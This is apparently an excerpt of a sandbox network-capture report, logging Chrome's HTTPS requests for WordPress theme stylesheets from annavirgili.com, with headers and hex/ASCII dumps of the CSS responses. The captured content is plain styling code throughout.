                                                                                                          2024-12-12 11:58:11 UTC14615INData Raw: 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 32 38 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 2d 34 70 78 3b 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e
                                                                                                          Data Ascii: .select2-container{box-sizing:border-box;display:inline-block;margin:0;position:relative;vertical-align:middle}.select2-container .select2-selection--single{box-sizing:border-box;cursor:pointer;display:block;height:28px;margin:0 0 -4px;-ms-user-select:non


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          33192.168.2.2449804147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:10 UTC590OUTGET /wp-content/themes/ciena/assets/css/theme.css?ver=1.0.8 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:11 UTC269INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:11 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:38:01 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 475534
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:11 UTC16384INData Raw: 68 74 6d 6c 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 0a 7d 0a 0a 2f 2a 20 57 6f 72 64 50 72 65 73 73 20 43 6f 72 65 20 2a 2f 0a 62 6f 64 79 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 36 64 36 64 36 64 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 20 20 2f 2a 20 54 65 78 74 20 6d 65 61 6e 74 20 6f 6e 6c 79 20 66 6f 72 20 73 63 72 65 65 6e 20 72 65 61 64 65 72 73 2e 20 2a 2f 0a 7d 0a 62 6f 64 79 20 2e 61 6c 69 67 6e 6e 6f 6e 65 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 32 30 70 78 20 32 30 70 78 20 30 3b 0a 7d 0a 62 6f 64 79 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 2c 20 62 6f 64 79 20 64 69
                                                                                                          Data Ascii: html { font-size: 1rem;}/* WordPress Core */body { position: relative; color: #6d6d6d; font-size: 15px; line-height: 1.5; /* Text meant only for screen readers. */}body .alignnone { margin: 5px 20px 20px 0;}body .aligncenter, body di
                                                                                                          2024-12-12 11:58:11 UTC16384INData Raw: 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 36 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 35 70 78 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 36 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 7d 0a 0a 2e 74 6f 70 2d 62 61 72 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 69 6e 68 65 72 69 74 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 33 3b 0a 7d 0a 2e 74 6f 70 2d 62 61 72 20 3e 20 2e 68 65 61 64 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a
                                                                                                          Data Ascii: -transform: uppercase; height: 36px; padding: 0 25px; line-height: 36px; font-weight: 500;}.top-bar { color: inherit; width: 100%; position: relative; z-index: 3;}.top-bar > .header-container { display: flex; align-items: center;
                                                                                                          2024-12-12 11:58:11 UTC16384INData Raw: 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 2e 70 61 67 65 2d 68 65 61 64 69 6e 67 2d 63 6f 6e 74 65 6e 74 2e 68 65 61 64 69 6e 67 2d 6c 65 66 74 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 7d 0a 2e 70 61 67 65 2d 68 65 61 64 69 6e 67 2d 63 6f 6e 74 65 6e 74 2e 68 65 61 64 69 6e 67 2d 63 65 6e 74 65 72 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 67 65 2d 68 65 61 64 69 6e 67 2d 63 6f 6e 74 65 6e 74 2e 68 65 61 64 69 6e 67 2d 72 69 67
                                                                                                          Data Ascii: ading-container { position: relative;}.page-heading-content.heading-left { text-align: left; justify-content: flex-start;}.page-heading-content.heading-center { text-align: center; justify-content: center;}.page-heading-content.heading-rig
                                                                                                          2024-12-12 11:58:11 UTC16384INData Raw: 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 72 69 67 68 74 3a 20 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 37 70 78 20 36 70 78 20 34 30 70 78 20 30 70 78 20 72 67 62 61 28 32 30 34 2c 20 32 30 34 2c 20 32 32 33 2c 20 30 2e 31 36 29 3b 0a 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 37 70 78 20 36 70 78 20 34 30 70 78 20 30 70 78 20 72 67 62 61 28 32 30 34 2c 20 32 30 34 2c 20 32 32 33 2c 20 30 2e 31 36 29 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 37 70 78 20 36 70 78 20 34 30 70 78 20 30 70 78 20 72 67 62 61 28 32 30 34 2c 20 32 30 34 2c 20 32 32 33 2c 20 30 2e
                                                                                                          Data Ascii: tion: absolute; padding: 0; left: 0; right: 0; background: #FFF; -webkit-box-shadow: 7px 6px 40px 0px rgba(204, 204, 223, 0.16); -moz-box-shadow: 7px 6px 40px 0px rgba(204, 204, 223, 0.16); box-shadow: 7px 6px 40px 0px rgba(204, 204, 223, 0.
                                                                                                          2024-12-12 11:58:11 UTC16384INData Raw: 2d 66 6f 72 6d 2d 72 65 67 69 73 74 65 72 20 2e 66 6f 72 6d 2d 72 6f 77 20 6c 61 62 65 6c 20 2e 72 65 71 75 69 72 65 64 2c 20 23 66 6d 2d 61 63 63 6f 75 6e 74 2d 6d 6f 64 61 6c 20 66 6f 72 6d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 6c 6f 67 69 6e 20 2e 66 6f 72 6d 2d 72 6f 77 20 6c 61 62 65 6c 20 2e 72 65 71 75 69 72 65 64 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 61 63 63 6f 75 6e 74 20 66 6f 72 6d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 72 65 67 69 73 74 65 72 20 2e 66 6f 72 6d 2d 72 6f 77 20 6c 61 62 65 6c 20 2e 72 65 71 75 69 72 65 64 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 61 63 63 6f 75 6e 74 20 66 6f 72 6d 2e 77
                                                                                                          Data Ascii: -form-register .form-row label .required, #fm-account-modal form.woocommerce-form.woocommerce-form-login .form-row label .required, .woocommerce-account form.woocommerce-form.woocommerce-form-register .form-row label .required, .woocommerce-account form.w
                                                                                                          2024-12-12 11:58:11 UTC16384INData Raw: 30 30 30 30 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 32 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 31 35 70 78 20 33 30 70 78 3b 0a 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 31 36 35 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 7d 0a 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 61 72 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 61 72 74 2d 66 6f 72 6d 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46
                                                                                                          Data Ascii: 0000; color: #FFF; font-size: 12px; text-transform: uppercase; text-align: center; line-height: 22px; padding: 15px 30px; min-width: 165px; font-weight: 500;}.woocommerce-cart .woocommerce-cart-form button.button:hover { background: #F
                                                                                                          2024-12-12 11:58:12 UTC16384INData Raw: 20 20 7d 0a 20 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 61 72 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 61 72 74 2d 66 6f 72 6d 20 74 61 62 6c 65 2e 73 68 6f 70 5f 74 61 62 6c 65 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 61 72 74 2d 66 6f 72 6d 5f 5f 63 6f 6e 74 65 6e 74 73 20 74 68 65 61 64 20 74 68 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 65 36 65 36 65 36 3b 0a 20 20 20 20
                                                                                                          Data Ascii: } .woocommerce-cart .woocommerce-cart-form table.shop_table.woocommerce-cart-form__contents thead th { font-weight: 500; font-size: 12px; text-transform: uppercase; color: #000000; line-height: 30px; border-color: #e6e6e6;
                                                                                                          2024-12-12 11:58:12 UTC16384INData Raw: 31 35 70 78 20 33 30 70 78 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 7d 0a 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 6c 6f 67 69 6e 20 62 75 74 74 6f 6e 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 6c 6f 67 69 6e 5f 5f 73 75 62 6d 69 74 3a 68 6f 76 65 72 2c 20 23 61 63 63 6f 75 6e 74 2d 63 61 6e 76 61 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 6c 6f 67 69 6e 20 62 75 74 74 6f 6e 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 6c 6f 67 69 6e 5f 5f 73 75 62 6d 69 74 3a 68 6f 76 65 72 20
                                                                                                          Data Ascii: 15px 30px; width: 100%; margin: 0; letter-spacing: 1px; font-weight: 500;}.woocommerce-page .woocommerce-form-login button.woocommerce-form-login__submit:hover, #account-canvas .woocommerce-form-login button.woocommerce-form-login__submit:hover
                                                                                                          2024-12-12 11:58:12 UTC16384INData Raw: 20 31 70 78 20 73 6f 6c 69 64 20 23 65 34 65 34 65 34 3b 0a 7d 0a 62 6f 64 79 20 2e 63 69 65 6e 61 2d 73 69 64 65 62 61 72 2d 63 6f 6e 74 65 6e 74 20 61 73 69 64 65 2e 77 69 64 67 65 74 2e 77 69 64 67 65 74 5f 63 61 6c 65 6e 64 61 72 20 74 61 62 6c 65 2e 77 70 2d 63 61 6c 65 6e 64 61 72 2d 74 61 62 6c 65 20 74 68 65 61 64 20 74 68 2c 20 62 6f 64 79 20 2e 63 69 65 6e 61 2d 73 69 64 65 62 61 72 2d 63 6f 6e 74 65 6e 74 20 61 73 69 64 65 2e 77 69 64 67 65 74 2e 77 69 64 67 65 74 5f 63 61 6c 65 6e 64 61 72 20 74 61 62 6c 65 2e 77 70 2d 63 61 6c 65 6e 64 61 72 2d 74 61 62 6c 65 20 74 68 65 61 64 20 74 64 2c 20 62 6f 64 79 20 2e 63 69 65 6e 61 2d 73 69 64 65 62 61 72 2d 63 6f 6e 74 65 6e 74 20 61 73 69 64 65 2e 77 69 64 67 65 74 2e 77 69 64 67 65 74 5f 63 61 6c
                                                                                                          Data Ascii: 1px solid #e4e4e4;}body .ciena-sidebar-content aside.widget.widget_calendar table.wp-calendar-table thead th, body .ciena-sidebar-content aside.widget.widget_calendar table.wp-calendar-table thead td, body .ciena-sidebar-content aside.widget.widget_cal
                                                                                                          2024-12-12 11:58:12 UTC16384INData Raw: 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 70 78 3b 0a 20 20 66 69 6c 6c 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 2d 63 61 6e 76 61 73 20 2e 6f 66 66 63 61 6e 76 61 73 2d 63 6f 6e 74 65 6e 74 20 2e 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 2d 73 63 72 65 65 6e 2d 69 6e 6e 65 72 20 2e 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 2d 74 69 74 6c 65 20 2e 6a 73 2d 6f 66 66 63 61 6e 76 61 73 2d 63 6c 6f 73 65 3a 68 6f 76 65 72 20 73 76 67 2e 66 6d 2d 69 63 6f 6e 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 46 42 35 38 35 38 3b 0a 7d 0a 23 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 2d 63 61 6e 76 61 73 20 2e 6f 66 66 63 61 6e 76 61 73 2d 63 6f 6e 74 65 6e 74 20 2e 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 2d 73 63 72 65 65 6e 2d
                                                                                                          Data Ascii: px; margin-left: 3px; fill: #000000;}#mobile-header-canvas .offcanvas-content .mobile-header-screen-inner .mobile-header-title .js-offcanvas-close:hover svg.fm-icon { fill: #FB5858;}#mobile-header-canvas .offcanvas-content .mobile-header-screen-


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          34192.168.2.2449806147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:11 UTC614OUTGET /wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.css?ver=1.2.9 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:11 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:11 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:38:49 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 5292
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:11 UTC5292INData Raw: 2e 63 2d 6f 66 66 63 61 6e 76 61 73 2c 20 2e 63 2d 6f 66 66 63 61 6e 76 61 73 2d 63 6f 6e 74 65 6e 74 2d 77 72 61 70 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 20 30 2c 20 30 29 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 2e 63 2d 6f 66 66 63 61 6e 76 61 73 2d 62 67 2e 63 2d 6f 66 66 63 61 6e 76 61 73 2d 62 67 2d 2d 70 75 73 68 2c 20 2e 63 2d 6f 66 66 63 61 6e 76 61 73 2d 62 67 2e 63 2d 6f 66 66 63 61 6e 76 61 73 2d 62 67 2d 2d 72 65 76 65 61 6c 2c 20 2e 63 2d 6f 66 66 63 61 6e 76 61 73 2d 63 6f 6e 74 65 6e 74 2d 77 72 61 70 2c 20
                                                                                                          Data Ascii: .c-offcanvas, .c-offcanvas-content-wrap { transform: translate3d(0, 0, 0); -webkit-backface-visibility: hidden; backface-visibility: hidden;}.c-offcanvas-bg.c-offcanvas-bg--push, .c-offcanvas-bg.c-offcanvas-bg--reveal, .c-offcanvas-content-wrap,


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          35192.168.2.2449808147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:12 UTC594OUTGET /wp-content/themes/ciena/assets/css/customize.css?ver=1.0.8 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:12 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:12 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 04 Sep 2024 07:54:07 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 34810
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:12 UTC16384INData Raw: 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4d 75 6c 69 73 68 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 70 78 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 7d 62 6f 64 79 20 7b 63 6f 6c 6f 72 3a 23 36 64 36 64 36 64 3b 7d 62 6f 64 79 20 62 75 74 74 6f 6e 2e 63 6c 6f 73 65 20 73 76 67 20 7b 20 66 69 6c 6c 3a 20 23 36 64 36 64 36 64 3b 7d 68 31 2c 20 2e 68 31 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4d 75 6c 69 73 68 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30
                                                                                                          Data Ascii: body{font-family: Mulish;font-weight: 400;font-size: 16px;line-height: 24px;letter-spacing: 0px;font-style: normal;font-weight: 400;font-style: normal;}body {color:#6d6d6d;}body button.close svg { fill: #6d6d6d;}h1, .h1{font-family: Mulish;font-weight: 40
                                                                                                          2024-12-12 11:58:12 UTC16384INData Raw: 2d 2d 70 69 6e 6e 65 64 2e 68 65 61 64 72 6f 6f 6d 2d 2d 6e 6f 74 2d 74 6f 70 20 2e 68 65 61 64 65 72 2d 6d 61 69 6e 20 2e 68 65 61 64 65 72 2d 65 6c 65 6d 65 6e 74 2e 77 69 73 68 6c 69 73 74 2d 62 6f 78 20 3e 20 61 20 73 70 61 6e 2c 62 6f 64 79 2e 66 61 6d 69 6c 61 62 5f 74 68 65 6d 65 20 2e 73 69 74 65 2d 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 2d 6c 61 79 6f 75 74 2e 68 65 61 64 72 6f 6f 6d 2d 2d 70 69 6e 6e 65 64 2e 68 65 61 64 72 6f 6f 6d 2d 2d 6e 6f 74 2d 74 6f 70 20 2e 68 65 61 64 65 72 2d 6d 61 69 6e 20 2e 68 65 61 64 65 72 2d 65 6c 65 6d 65 6e 74 2e 68 61 6d 62 75 72 67 65 72 2d 62 6f 78 20 3e 20 61 2c 62 6f 64 79 2e 66 61 6d 69 6c 61 62 5f 74 68 65 6d 65 20 2e 73 69 74 65 2d 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 2d 6c 61 79 6f 75 74 2e 68
                                                                                                          Data Ascii: --pinned.headroom--not-top .header-main .header-element.wishlist-box > a span,body.familab_theme .site-header .header-layout.headroom--pinned.headroom--not-top .header-main .header-element.hamburger-box > a,body.familab_theme .site-header .header-layout.h
                                                                                                          2024-12-12 11:58:12 UTC2042INData Raw: 72 2d 65 6c 65 6d 65 6e 74 2e 68 74 6d 6c 5f 72 69 67 68 74 5f 31 20 73 76 67 2c 62 6f 64 79 2e 66 61 6d 69 6c 61 62 5f 74 68 65 6d 65 20 2e 73 69 74 65 2d 68 65 61 64 65 72 2e 66 6d 63 2d 74 72 61 6e 73 70 61 72 65 6e 74 2d 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 2d 6d 61 69 6e 20 2e 68 65 61 64 65 72 2d 65 6c 65 6d 65 6e 74 2e 68 74 6d 6c 5f 72 69 67 68 74 5f 31 20 73 76 67 2e 66 6d 2d 69 63 6f 6e 2c 62 6f 64 79 2e 66 61 6d 69 6c 61 62 5f 74 68 65 6d 65 20 2e 73 69 74 65 2d 68 65 61 64 65 72 2e 66 6d 63 2d 74 72 61 6e 73 70 61 72 65 6e 74 2d 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 2d 6d 61 69 6e 20 2e 68 65 61 64 65 72 2d 65 6c 65 6d 65 6e 74 2e 68 74 6d 6c 5f 6c 65 66 74 5f 31 20 73 76 67 2c 62 6f 64 79 2e 66 61 6d 69 6c 61 62 5f 74 68 65 6d 65 20
                                                                                                          Data Ascii: r-element.html_right_1 svg,body.familab_theme .site-header.fmc-transparent-header .header-main .header-element.html_right_1 svg.fm-icon,body.familab_theme .site-header.fmc-transparent-header .header-main .header-element.html_left_1 svg,body.familab_theme


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          36192.168.2.2449809147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:12 UTC595OUTGET /wp-content/themes/ciena/assets/css/main_color.css?ver=1.0.8 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:12 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:12 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 04 Sep 2024 07:54:07 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 13500
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
